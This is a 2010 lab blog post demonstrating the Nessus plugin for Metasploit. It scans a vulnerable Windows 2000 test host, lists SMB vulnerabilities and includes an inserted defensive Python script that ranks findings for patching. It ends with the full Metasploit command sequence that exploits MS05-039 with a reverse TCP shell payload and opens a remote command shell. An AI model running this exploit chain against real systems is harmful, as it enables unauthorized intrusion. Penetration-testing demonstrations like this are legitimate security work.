Alexandro Silva: Playing with the Nessus plugin for Metasploit

September 28, 2010
Recently the developer Zate Berg released a Nessus plug-in for the Metasploit Framework; it is available in the development version of MSF.

For the tests I used the following setup:

* Debian host with Nessus and Metasploit
* Target host running Windows 2000, "buggy to the core"

First I updated MSF and Nessus, then moved on to the fun part

cd /tmp/pentest_tools/trunk
svn update
/opt/nessus/sbin/nessus-service &


[Metasploit ASCII-art banner]

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 592 exploits - 302 auxiliary
+ -- --=[ 225 payloads - 27 encoders - 8 nops
=[ svn r10505 updated today (2010.09.28)


Fun :)

Loading the Nessus plug-in

msf> load nessus

[*] Nessus Bridge for Nessus 4.2.x
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus


msf> nessus_connect localhost:8834 ok

[+] Username:
[+] Password:
[*] Connecting to https://localhost:8834/ as alexos
[*] Authenticated

Listing the policies that exist in Nessus

msf> nessus_policy_list

[+] Nessus Policy List

ID Name   Owner  visability
-- ----   -----  ----------
1 attack alexos private

Starting the scan

msf> nessus_scan_new 1 alexoscorelabs

[*] Creating scan from policy number 1, called "alexoscorelabs" and scanning
[*] Scan started. uid is af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0

With the scan finished, it is time to check the report

msf> nessus_report_hosts_ports af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8

[+] Host Info

Port  Protocol  Severity  Service Name  Sev 0  Sev 1  Sev 2  Sev 3
----  --------  --------  ------------  -----  -----  -----  -----
0     icmp      1         general       0      2      0      0
0     tcp       3         general       0      9      0      1
0     udp       1         general       0      1      0      0
21    tcp       3         ftp           1      4      2      2
135   tcp       3         epmap         1      1      0      1
135   udp       3         epmap?        0      0      0      1
137   udp       1         netbios-ns    0      1      0      0
139   tcp       1         smb           1      1      0      0
445   tcp       3         cifs          1      10     2      12
1025  tcp       3         dce-rpc       1      1      0      1
1028  udp       1         dce-rpc       0      1      0      0
5800  tcp       1         www           1      4      0      0
5801  tcp       1         www           1      3      0      0
5900  tcp       3         vnc           1      2      0      1
5901  tcp       1         vnc           1      3      0      0

Getting information about the vulnerabilities found on the target's port 445 (smb)

msf> nessus_report_host_detail 445 tcp af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0

[+] Port Info

Port Severity PluginID Plugin Name CVSS2 Exploit? CVE Risk Factor CVSS Vector
---- -------- -------- ----------- ----- -------- --- ----------- -----------
cifs (445/tcp) 1 10736 DCE Services Enumeration none . . None .
cifs (445/tcp) 1 10785 SMB NativeLanManager Remote System Information Disclosure none . . None .
cifs (445/tcp) 1 10394 SMB Log In Possible none false CVE-1999-0504 None .
cifs (445/tcp) 1 11011 SMB Service Detection none . . None .
cifs (445/tcp) 1 10395 SMB Shares Enumeration none . . None .
cifs (445/tcp) 1 26920 Windows SMB NULL Session Authentication none false CVE-1999-0519 None .
cifs (445/tcp) 1 17651 Obtains the password policy none . . None .
cifs (445/tcp) 3 22034 MS06-035: Vulnerability in Server Service Could Allow Remote Code Execution (917159) (uncredentialed check) 7.5 true CVE-2006-1314 High CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P
cifs (445/tcp) 3 19407 MS05-043: Vulnerability in Printer Spooler Service Could Allow Remote Code Execution (896423) (uncredentialed check) 10.0 true CVE-2005-1984 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 3 12209 MS04-011: Security Update for Microsoft Windows (835732) (uncredentialed check) 10.0 true CVE-2003-0533 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 3 12054 MS04-007: ASN.1 Vulnerability Could Allow Code Execution (828028) (uncredentialed check) 10.0 true CVE-2003-0818 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 1 10859 SMB LsaQueryInformationPolicy Function SID Enumeration none true CVE-2000-1200 None .
cifs (445/tcp) 3 22194 MS06-040: Vulnerability in Server Service Could Allow Remote Code Execution (921883) (uncredentialed check) 10.0 true CVE-2006-3439 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 3 19408 MS05-039: Vulnerability in Plug and Play Service Could Allow Remote Code Execution (899588) (uncredentialed check) 10.0 true CVE-2005-1983 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 3 21193 MS05-047: Plug and Play Remote Code Execution and Local Privilege Elevation (905749) (uncredentialed check) 10.0 false CVE-2005-2120 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 2 18602 SMB svcctl MSRPC Interface SCM Service Enumeration 5.0 false CVE-2005-2150 Medium CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N
cifs (445/tcp) 2 18585 SMB Service Enumeration via \srvsvc 5.0 false CVE-2005-2150 Medium CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N
cifs (445/tcp) 3 35362 MS09-001: Microsoft Windows SMB Vulnerabilities Remote Code Execution (958687) (uncredentialed check) 10.0 . CVE-2008-4834 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 1 26917 SMB Registry : Nessus Cannot Access the Windows Registry none . . None .
cifs (445/tcp) 3 18502 MS05-027: Vulnerability in SMB Could Allow Remote Code Execution (896422) (uncredentialed check) 10.0 false CVE-2005-1206 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 3 11835 MS03-039: Microsoft RPC Interface Buffer Overrun (824146) (uncredentialed check) 10.0 true CVE-2003-0715 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 1 10860 SMB Use Host SID to Enumerate Local Users none true CVE-2000-1200 None .
cifs (445/tcp) 3 11808 MS03-026: Microsoft RPC Interface Buffer Overrun (823980) 10.0 true CVE-2003-0352 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 3 11110 MS02-045: Microsoft Windows SMB Protocol SMB_COM_TRANSACTION Packet Remote Overflow DoS (326830) 7.5 true CVE-2002-0724 High CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P
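The port-detail listing above is what a defender has to turn into a patch queue. As an added example (not part of the original post or of the Nessus bridge plugin), the following Python parses rows in the plugin's plain-text format into records and orders them for remediation: highest risk factor first, then findings Nessus flags as having a public exploit, then CVSS2 base score. The sample rows are copied from the listing above; the record fields, the ROW_RE pattern and the ranking rule are my own assumptions about the column layout, not an API of the plugin.

```python
"""Triage helper for nessus_report_host_detail output (added example)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Column order assumed from the plugin's header line:
# Port Severity PluginID Plugin Name CVSS2 Exploit? CVE Risk Factor CVSS Vector
ROW_RE = re.compile(
    r"^(?P<port>\S+ \(\d+/(?:tcp|udp)\))\s+"
    r"(?P<severity>\d)\s+"
    r"(?P<plugin_id>\d+)\s+"
    r"(?P<name>.+?)\s+"
    r"(?P<cvss>none|\d+(?:\.\d+)?)\s+"
    r"(?P<exploit>true|false|\.)\s+"
    r"(?P<cve>CVE-\d{4}-\d{4,}|\.)\s+"
    r"(?P<risk>None|Low|Medium|High|Critical)\s+"
    r"(?P<vector>\S+)$"
)
RISK_RANK = {"Critical": 4, "High": 3, "Medium": 2, "Low": 1, "None": 0}
BULLETIN_RE = re.compile(r"^(MS\d{2}-\d{3})")


@dataclass
class Finding:
    port: str
    severity: int
    plugin_id: int
    name: str
    cvss: Optional[float]               # None when the plugin prints "none"
    exploit_available: Optional[bool]   # None when the plugin prints "."
    cve: Optional[str]
    risk: str
    vector: Optional[str]

    @property
    def bulletin(self) -> Optional[str]:
        """Microsoft bulletin id (e.g. MS05-039) when the plugin name starts with one."""
        m = BULLETIN_RE.match(self.name)
        return m.group(1) if m else None


def parse_row(line: str) -> Optional[Finding]:
    """Parse one table row; header, separator and blank lines return None."""
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    g = m.groupdict()
    return Finding(
        port=g["port"],
        severity=int(g["severity"]),
        plugin_id=int(g["plugin_id"]),
        name=g["name"],
        cvss=None if g["cvss"] == "none" else float(g["cvss"]),
        exploit_available={"true": True, "false": False}.get(g["exploit"]),
        cve=None if g["cve"] == "." else g["cve"],
        risk=g["risk"],
        vector=None if g["vector"] == "." else g["vector"],
    )


def parse_report(text: str) -> List[Finding]:
    return [f for f in (parse_row(line) for line in text.splitlines()) if f]


def remediation_order(findings: List[Finding]) -> List[Finding]:
    """Highest risk factor first; within a tier, findings with a public exploit
    first; then higher CVSS2 score. sorted() is stable, so ties keep report order."""
    return sorted(
        findings,
        key=lambda f: (RISK_RANK[f.risk], f.exploit_available is True, f.cvss or 0.0),
        reverse=True,
    )


def risk_summary(findings: List[Finding]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.risk] = counts.get(f.risk, 0) + 1
    return counts


def missing_bulletins(findings: List[Finding]) -> List[str]:
    """Sorted, de-duplicated Microsoft bulletins the host still lacks."""
    return sorted({f.bulletin for f in findings if f.bulletin})


# Constructed sample: a subset of the rows from the listing in the post.
SAMPLE = """\
Port Severity PluginID Plugin Name CVSS2 Exploit? CVE Risk Factor CVSS Vector
---- -------- -------- ----------- ----- -------- --- ----------- -----------
cifs (445/tcp) 1 10394 SMB Log In Possible none false CVE-1999-0504 None .
cifs (445/tcp) 3 22034 MS06-035: Vulnerability in Server Service Could Allow Remote Code Execution (917159) (uncredentialed check) 7.5 true CVE-2006-1314 High CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P
cifs (445/tcp) 3 19408 MS05-039: Vulnerability in Plug and Play Service Could Allow Remote Code Execution (899588) (uncredentialed check) 10.0 true CVE-2005-1983 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 3 21193 MS05-047: Plug and Play Remote Code Execution and Local Privilege Elevation (905749) (uncredentialed check) 10.0 false CVE-2005-2120 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 2 18585 SMB Service Enumeration via \\srvsvc 5.0 false CVE-2005-2150 Medium CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N
cifs (445/tcp) 3 35362 MS09-001: Microsoft Windows SMB Vulnerabilities Remote Code Execution (958687) (uncredentialed check) 10.0 . CVE-2008-4834 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
"""

if __name__ == "__main__":
    findings = parse_report(SAMPLE)
    for f in remediation_order(findings):
        print(f"{f.risk:8} exploit={str(f.exploit_available):5} cvss={f.cvss} "
              f"{f.bulletin or '-'} {f.cve or '-'} {f.name[:48]}")
    print(risk_summary(findings))
    print(missing_bulletins(findings))
```

Run it on the full listing by pasting the rows into SAMPLE or feeding a saved console log to parse_report(); the resulting bulletin list is the concrete patch set for the host, and the ordering puts the items that also have a public exploit at the top.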

Using MSF I exploited MS05-039: Vulnerability in Plug and Play Service Could Allow Remote Code Execution

msf> use exploit/windows/smb/ms05_039_pnp

msf exploit(ms05_039_pnp)> set RHOST

msf exploit(ms05_039_pnp)> set PAYLOAD windows/shell/reverse_tcp

msf exploit(ms05_039_pnp)> set LHOST

msf exploit(ms05_039_pnp)> exploit

[*] Started reverse handler on
[*] Connecting to the SMB service…
[*] Binding to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:[\browser] …
[*] Bound to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:[\browser] …
[*] Calling the vulnerable function…
[*] Sending stage (240 bytes) to
[*] Command shell session 1 opened ( -> at Tue Sep 28 17:24:01 -0300 2010
[*] Server did not respond, this is expected
[*] The server should have executed our payload

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.


C:\WINNT\system32> ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . :
Subnet Mask . . . . . . . . . . . :
Default Gateway . . . . . . . . . :

MSF add-ons like these are always welcome; another interesting integration is Metasploit with Ettercap for MITM testing.

